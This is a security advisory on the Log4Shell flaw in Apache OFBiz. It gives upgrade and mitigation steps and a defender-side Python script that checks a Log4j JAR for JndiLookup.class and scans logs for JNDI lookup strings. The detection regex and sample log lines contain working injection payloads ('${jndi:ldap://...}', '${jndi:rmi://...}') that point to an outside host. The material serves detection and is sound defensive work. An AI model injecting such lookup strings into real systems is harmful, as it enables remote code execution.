Apache OFBiz Log4Shell RCE
Description
Apache OFBiz versions prior to 17.12.09 and 18.12.03 are vulnerable to remote code execution through the Log4Shell vulnerability (CVE-2021-44228) in the Apache Log4j library. This critical vulnerability allows attackers to execute arbitrary code by injecting malicious JNDI lookup strings into logged data, which can be exploited without authentication.
Remediation
Immediately upgrade Apache OFBiz to a patched version:
For 17.12.x branch: Upgrade to version 17.12.09 or later
For 18.12.x branch: Upgrade to version 18.12.03 or later
Interim mitigation steps if immediate upgrade is not possible:
1. Set the JVM parameter -Dlog4j2.formatMsgNoLookups=true
2. Remove the JndiLookup class from the Log4j JAR file:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
3. Monitor logs for exploitation attempts containing strings like ${jndi:ldap:// or ${jndi:rmi://
4. Implement network egress filtering to block unexpected outbound connections
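The following script is an added example and not part of the OFBiz advisory or project; it verifies two of the interim mitigations above from the defender's side. `jar_has_jndi_lookup()` checks whether a log4j-core JAR still contains the `JndiLookup.class` entry that step 2 removes, and `find_jndi_lookups()` scans log lines for the `${jndi:` lookup prefix from step 3. The regex accepts any URI scheme after `jndi:` rather than only `ldap`/`rmi`, which is an assumption beyond the page. The JAR path, the `make_sample_jar()` helper and the sample log lines are constructed for the example.

```python
"""Defender-side checks for two of the interim Log4Shell mitigations.

Added example, not code from the Apache OFBiz advisory or project. The JAR
contents and log lines below are constructed samples, not real artifacts.
"""
import re
import sys
import tempfile
import zipfile
from typing import Iterable, List, Tuple

# Entry that mitigation step 2 strips from log4j-core with `zip -d`.
JNDI_LOOKUP_ENTRY = "org/apache/logging/log4j/core/lookup/JndiLookup.class"

# Lookup prefix from step 3. The scheme group is deliberately generic so
# ldap, rmi and any other scheme after "jndi:" are all reported; the
# match is case-insensitive because the lookup keyword is (assumption).
JNDI_PATTERN = re.compile(r"\$\{jndi:(?P<scheme>[a-z0-9+.-]+):", re.IGNORECASE)


def jar_has_jndi_lookup(jar_path: str) -> bool:
    """Return True if the JAR still ships JndiLookup.class (step 2 not applied)."""
    with zipfile.ZipFile(jar_path) as jar:
        return JNDI_LOOKUP_ENTRY in jar.namelist()


def find_jndi_lookups(lines: Iterable[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, scheme, matched_prefix) for every lookup string found."""
    hits: List[Tuple[int, str, str]] = []
    for lineno, line in enumerate(lines, start=1):
        for match in JNDI_PATTERN.finditer(line):
            hits.append((lineno, match.group("scheme").lower(), match.group(0)))
    return hits


def make_sample_jar(include_jndi_lookup: bool) -> str:
    """Write a constructed stand-in JAR (a zip with dummy entries) and return its path."""
    fd, path = tempfile.mkstemp(suffix=".jar")
    with zipfile.ZipFile(path, "w") as jar:
        jar.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
        jar.writestr("org/apache/logging/log4j/core/Logger.class", b"\xca\xfe\xba\xbe")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_ENTRY, b"\xca\xfe\xba\xbe")
    import os
    os.close(fd)
    return path


# Constructed access-log lines (not real traffic): one benign request and two
# carrying the lookup strings step 3 tells you to watch for. 203.0.113.0/24 is
# a documentation address range.
SAMPLE_LOG = [
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://203.0.113.7:1389/a}"',
    '10.0.0.9 - - "POST /login HTTP/1.1" 302 "${JNDI:rmi://203.0.113.7:1099/b}"',
]


def main(argv: List[str]) -> None:
    # Any JAR paths given on the command line are checked for step 2.
    for jar_path in argv[1:]:
        status = "still present" if jar_has_jndi_lookup(jar_path) else "removed"
        print(f"{jar_path}: JndiLookup.class {status}")
    # The constructed log lines are scanned for step 3.
    for lineno, scheme, prefix in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {lineno}: jndi lookup via {scheme} ({prefix})")


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python check_log4shell.py /path/to/log4j-core-2.x.jar` to confirm the class removal took effect; in a real deployment, feed `find_jndi_lookups()` the application and web-server access logs rather than the constructed sample. Note that the check in `jar_has_jndi_lookup()` only inspects the JAR you name; shaded or nested copies of Log4j inside other archives need the same check applied to each copy.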
Note: Interim mitigations are temporary measures only. Upgrading to a patched version is the only complete solution.